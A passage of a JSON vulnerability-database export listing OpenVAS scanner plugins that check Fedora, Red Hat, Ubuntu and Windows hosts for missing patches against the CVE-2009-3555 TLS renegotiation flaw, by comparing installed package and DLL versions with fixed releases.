and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"gnutls on Fedora 12\";\ntag_insight = \"GnuTLS is a project that aims to develop a library which provides a secure\n layer, over a reliable transport layer. Currently the GnuTLS library implements\n the proposed standards by the IETF's TLS working group.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2010-June/043445.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.862207\");\n script_version(\"$Revision: 8246 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-26 08:29:20 +0100 (Tue, 26 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-06-28 09:16:14 +0200 (Mon, 28 Jun 2010)\");\n script_tag(name:\"cvss_base\", value:\"5.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_xref(name: \"FEDORA\", value: \"2010-9487\");\n script_cve_id(\"CVE-2009-3555\");\n script_name(\"Fedora Update for gnutls FEDORA-2010-9487\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of gnutls\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC12\")\n{\n\n if ((res = isrpmvuln(pkg:\"gnutls\", rpm:\"gnutls~2.8.6~2.fc12\", rls:\"FC12\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-12-14T11:48:22", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3555"], "description": "Check for the Version of gnutls", "modified": "2017-12-13T00:00:00", "published": "2010-06-28T00:00:00", "id": "OPENVAS:862207", "href": "http://plugins.openvas.org/nasl.php?oid=862207", "type": "openvas", "title": "Fedora Update for gnutls FEDORA-2010-9487", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for gnutls FEDORA-2010-9487\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"gnutls on Fedora 12\";\ntag_insight = \"GnuTLS is a project that aims to develop a library which provides a secure\n layer, over a reliable transport layer. Currently the GnuTLS library implements\n the proposed standards by the IETF's TLS working group.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2010-June/043445.html\");\n script_id(862207);\n script_version(\"$Revision: 8092 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-13 07:31:16 +0100 (Wed, 13 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-06-28 09:16:14 +0200 (Mon, 28 Jun 2010)\");\n script_tag(name:\"cvss_base\", value:\"5.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_xref(name: \"FEDORA\", value: \"2010-9487\");\n script_cve_id(\"CVE-2009-3555\");\n script_name(\"Fedora Update for gnutls FEDORA-2010-9487\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of gnutls\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC12\")\n{\n\n if ((res = isrpmvuln(pkg:\"gnutls\", rpm:\"gnutls~2.8.6~2.fc12\", rls:\"FC12\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-12-21T11:33:22", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3555"], "description": "Check for the Version of nss", "modified": "2017-12-20T00:00:00", "published": "2010-03-31T00:00:00", "id": "OPENVAS:861798", "href": "http://plugins.openvas.org/nasl.php?oid=861798", "type": "openvas", "title": "Fedora Update for nss FEDORA-2010-3905", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for nss FEDORA-2010-3905\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"nss on Fedora 11\";\ntag_insight = \"Network Security Services (NSS) is a set of libraries designed to\n support cross-platform development of security-enabled client and\n server applications. Applications built with NSS can support SSL v2\n and v3, TLS, PKCS #5, PKCS #7, PKCS #11, PKCS #12, S/MIME, X.509\n v3 certificates, and other security standards.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2010-March/037711.html\");\n script_id(861798);\n script_version(\"$Revision: 8186 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-20 07:30:34 +0100 (Wed, 20 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-03-31 14:20:46 +0200 (Wed, 31 Mar 2010)\");\n script_tag(name:\"cvss_base\", value:\"5.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_xref(name: \"FEDORA\", value: \"2010-3905\");\n script_cve_id(\"CVE-2009-3555\");\n script_name(\"Fedora Update for nss FEDORA-2010-3905\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of nss\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC11\")\n{\n\n if ((res = isrpmvuln(pkg:\"nss\", rpm:\"nss~3.12.6~1.2.fc11\", rls:\"FC11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-01-19T15:04:46", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3555"], "description": "Check for the Version of nss", "modified": "2018-01-18T00:00:00", "published": "2010-03-31T00:00:00", "id": "OPENVAS:1361412562310870238", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310870238", "type": "openvas", "title": "RedHat Update for nss RHSA-2010:0165-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for nss RHSA-2010:0165-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Network Security Services (NSS) is a set of libraries designed to support\n the cross-platform development of security-enabled client and server\n applications. Applications built with NSS can support SSLv2, SSLv3, TLS,\n and other security standards.\n\n Netscape Portable Runtime (NSPR) provides platform independence for non-GUI\n operating system facilities. These facilities include threads, thread\n synchronization, normal file and network I/O, interval timing, calendar\n time, basic memory management (malloc and free), and shared library\n linking.\n \n A flaw was found in the way the TLS/SSL (Transport Layer Security/Secure\n Sockets Layer) protocols handled session renegotiation. A man-in-the-middle\n attacker could use this flaw to prefix arbitrary plain text to a client's\n session (for example, an HTTPS connection to a website). This could force\n the server to process an attacker's request as if authenticated using the\n victim's credentials. This update addresses this flaw by implementing the\n TLS Renegotiation Indication Extension, as defined in RFC 5746.\n (CVE-2009-3555)\n \n Refer to the following Knowledgebase article for additional details about\n this flaw: http://kbase.redhat.com/faq/docs/DOC-20491 \n \n Users of Red Hat Certificate System 7.3 and 8.0 should review the following\n Knowledgebase article before installing this update:\n http://kbase.redhat.com/faq/docs/DOC-28439\n \n All users of NSS are advised to upgrade to these updated packages, which\n update NSS to version 3.12.6. This erratum also updates the NSPR packages\n to the version required by NSS 3.12.6. All running applications using the\n NSS library must be restarted for this update to take effect.\";\n\ntag_affected = \"nss on Red Hat Enterprise Linux (v. 5 server),\n Red Hat Enterprise Linux AS version 4,\n Red Hat Enterprise Linux ES version 4,\n Red Hat Enterprise Linux WS version 4\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2010-March/msg00023.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.870238\");\n script_version(\"$Revision: 8457 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-18 08:58:32 +0100 (Thu, 18 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-03-31 14:20:46 +0200 (Wed, 31 Mar 2010)\");\n script_tag(name:\"cvss_base\", value:\"5.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_xref(name: \"RHSA\", value: \"2010:0165-01\");\n script_cve_id(\"CVE-2009-3555\");\n script_name(\"RedHat Update for nss RHSA-2010:0165-01\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of nss\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"nspr\", rpm:\"nspr~4.8.4~1.el5_4\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nspr-debuginfo\", rpm:\"nspr-debuginfo~4.8.4~1.el5_4\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nspr-devel\", rpm:\"nspr-devel~4.8.4~1.el5_4\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nss\", rpm:\"nss~3.12.6~1.el5_4\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nss-debuginfo\", rpm:\"nss-debuginfo~3.12.6~1.el5_4\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nss-devel\", rpm:\"nss-devel~3.12.6~1.el5_4\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nss-pkcs11-devel\", rpm:\"nss-pkcs11-devel~3.12.6~1.el5_4\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nss-tools\", rpm:\"nss-tools~3.12.6~1.el5_4\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"RHENT_4\")\n{\n\n if ((res = isrpmvuln(pkg:\"nspr\", rpm:\"nspr~4.8.4~1.1.el4_8\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nspr-debuginfo\", rpm:\"nspr-debuginfo~4.8.4~1.1.el4_8\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nspr-devel\", rpm:\"nspr-devel~4.8.4~1.1.el4_8\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nss\", rpm:\"nss~3.12.6~1.el4_8\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nss-debuginfo\", rpm:\"nss-debuginfo~3.12.6~1.el4_8\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nss-devel\", rpm:\"nss-devel~3.12.6~1.el4_8\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nss-tools\", rpm:\"nss-tools~3.12.6~1.el4_8\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-12-04T11:17:59", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3555"], "description": "Ubuntu Update for Linux kernel vulnerabilities USN-927-6", "modified": "2017-12-01T00:00:00", "published": "2010-07-26T00:00:00", "id": "OPENVAS:840468", "href": "http://plugins.openvas.org/nasl.php?oid=840468", "type": "openvas", "title": "Ubuntu Update for nss vulnerability USN-927-6", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_927_6.nasl 7965 2017-12-01 07:38:25Z santu $\n#\n# Ubuntu Update for nss vulnerability USN-927-6\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"USN-927-1 fixed vulnerabilities in NSS on Ubuntu 9.10. This update provides the\n corresponding updates for Ubuntu 9.04.\n\n Original advisory details:\n \n Marsh Ray and Steve Dispensa discovered a flaw in the TLS and SSLv3\n protocols. If an attacker could perform a man in the middle attack at the\n start of a TLS connection, the attacker could inject arbitrary content at\n the beginning of the user's session. This update adds support for the new\n new renegotiation extension and will use it when the server supports it.\";\n\ntag_summary = \"Ubuntu Update for Linux kernel vulnerabilities USN-927-6\";\ntag_affected = \"nss vulnerability on Ubuntu 9.04\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-927-6/\");\n script_id(840468);\n script_version(\"$Revision: 7965 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 08:38:25 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-07-26 16:14:51 +0200 (Mon, 26 Jul 2010)\");\n script_tag(name:\"cvss_base\", value:\"5.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_xref(name: \"USN\", value: \"927-6\");\n script_cve_id(\"CVE-2009-3555\");\n script_name(\"Ubuntu Update for nss vulnerability USN-927-6\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU9.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libnss3-1d-dbg\", ver:\"3.12.6-0ubuntu0.9.04.1\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libnss3-1d\", ver:\"3.12.6-0ubuntu0.9.04.1\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libnss3-dev\", ver:\"3.12.6-0ubuntu0.9.04.1\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libnss3-0d\", ver:\"3.12.6-0ubuntu0.9.04.1\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libnss3-tools\", ver:\"3.12.6-0ubuntu0.9.04.1\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2020-04-27T19:23:08", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3555"], "description": "This host is missing a critical security update according to\n Microsoft Bulletin MS10-049.", "modified": "2020-04-23T00:00:00", "published": "2010-08-11T00:00:00", "id": "OPENVAS:1361412562310900247", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310900247", "type": "openvas", "title": "Remote Code Execution Vulnerabilities in SChannel (980436)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Remote Code Execution Vulnerabilities in SChannel (980436)\n#\n# Authors:\n# Veerendra G.G <veerendragg@secpod.com>\n#\n# Updated By: Madhuri D <dmadhuri@secpod.com> on 2010-09-12\n# - To detect file version 'SChannel.dll' on vista, win 2008 and win 7\n#\n# Copyright (C) 2010 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Fioundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.900247\");\n script_version(\"2020-04-23T12:22:09+0000\");\n script_tag(name:\"last_modification\", value:\"2020-04-23 12:22:09 +0000 (Thu, 23 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2010-08-11 15:08:29 +0200 (Wed, 11 Aug 2010)\");\n script_bugtraq_id(36935);\n script_cve_id(\"CVE-2009-3555\");\n script_tag(name:\"cvss_base\", value:\"5.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_name(\"Remote Code Execution Vulnerabilities in SChannel (980436)\");\n script_xref(name:\"URL\", value:\"http://xforce.iss.net/xforce/xfdb/54158\");\n script_xref(name:\"URL\", value:\"https://docs.microsoft.com/en-us/security-updates/securitybulletins/2010/ms10-049\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2010 SecPod\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"secpod_reg_enum.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/registry_enumerated\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of this issue may allow attackers to perform limited\n man-in-the-middle attacks to inject data into the beginning of the\n application protocol stream to execute HTTP transactions, bypass\n authentication.\");\n script_tag(name:\"affected\", value:\"- Microsoft Windows 7\n\n - Microsoft Windows XP Service Pack 3 and prior\n\n - Microsoft Windows 2K3 Service Pack 2 and prior\n\n - Microsoft Windows Vista Service Pack 1/2 and prior\n\n - Microsoft Windows Server 2008 Service Pack 1/2 and prior\");\n script_tag(name:\"insight\", value:\"A flaw exists in the Microsoft Windows SChannel (Secure Channel)\n authentication component when using certificate based authentication, which\n allows spoofing.\");\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n script_tag(name:\"summary\", value:\"This host is missing a critical security update according to\n Microsoft Bulletin MS10-049.\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(xp:4, win2003:3, winVista:3, win7:1, win2008:3) <= 0){\n exit(0);\n}\n\nif(hotfix_missing(name:\"980436\") == 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(sysPath)\n{\n dllVer = fetch_file_version(sysPath:sysPath, file_name:\"Schannel.dll\");\n if(!dllVer){\n exit(0);\n }\n}\n\nif(hotfix_check_sp(xp:4) > 0)\n{\n SP = get_kb_item(\"SMB/WinXP/ServicePack\");\n if(\"Service Pack 3\" >< SP)\n {\n if(version_is_less(version:dllVer, test_version:\"5.1.2600.6006\")){\n report = report_fixed_ver(installed_version:dllVer, fixed_version:\"5.1.2600.6006\", install_path:sysPath);\n security_message(port: 0, data: report);\n }\n exit(0);\n }\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n}\n\nif(hotfix_check_sp(win2003:3) > 0)\n{\n SP = get_kb_item(\"SMB/Win2003/ServicePack\");\n if(\"Service Pack 2\" >< SP)\n {\n if(version_is_less(version:dllVer, test_version:\"5.2.3790.4724\")){\n report = report_fixed_ver(installed_version:dllVer, fixed_version:\"5.2.3790.4724\", install_path:sysPath);\n security_message(port: 0, data: report);\n }\n exit(0);\n }\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n}\n\nsysPath = smb_get_system32root();\nif(sysPath)\n{\n dllVer = fetch_file_version(sysPath:sysPath, file_name:\"Schannel.dll\");\n if(!dllVer){\n exit(0);\n }\n}\n\nif(hotfix_check_sp(winVista:3) > 0)\n{\n SP = get_kb_item(\"SMB/WinVista/ServicePack\");\n if(\"Service Pack 1\" >< SP)\n {\n if(version_is_less(version:dllVer, test_version:\"6.0.6001.18490\")){\n report = report_fixed_ver(installed_version:dllVer, fixed_version:\"6.0.6001.18490\", install_path:sysPath);\n security_message(port: 0, data: report);\n }\n exit(0);\n }\n\n if(\"Service Pack 2\" >< SP)\n {\n if(version_is_less(version:dllVer, test_version:\"6.0.6002.18269\")){\n report = report_fixed_ver(installed_version:dllVer, fixed_version:\"6.0.6002.18269\", install_path:sysPath);\n security_message(port: 0, data: report);\n }\n exit(0);\n }\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n}\n\nelse if(hotfix_check_sp(win2008:3) > 0)\n{\n SP = get_kb_item(\"SMB/Win2008/ServicePack\");\n if(\"Service Pack 1\" >< SP)\n {\n if(version_is_less(version:dllVer, test_version:\"6.0.6001.18490\")){\n report = report_fixed_ver(installed_version:dllVer, fixed_version:\"6.0.6001.18490\", install_path:sysPath);\n security_message(port: 0, data: report);\n }\n exit(0);\n }\n\n if(\"Service Pack 2\" >< SP)\n {\n if(version_is_less(version:dllVer, test_version:\"6.0.6002.18269\")){\n report = report_fixed_ver(installed_version:dllVer, fixed_version:\"6.0.6002.18269\", install_path:sysPath);\n security_message(port: 0, data: report);\n }\n exit(0);\n }\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n}\n\nelse if(hotfix_check_sp(win7:1) > 0)\n{\n if(version_is_less(version:dllVer, test_version:\"6.1.7600.16612\")){\n report = report_fixed_ver(installed_version:dllVer, fixed_version:\"6.1.7600.16612\", install_path:sysPath);\n security_message(port: 0, data: report);\n }\n}\n\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2019-05-29T18:36:30", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3555"], "description": "Oracle Linux Local Security Checks ELSA-2010-0164", "modified": "2018-09-28T00:00:00", "published": "2015-10-06T00:00:00", "id": "OPENVAS:1361412562310122382", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310122382", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2010-0164", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2010-0164.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the 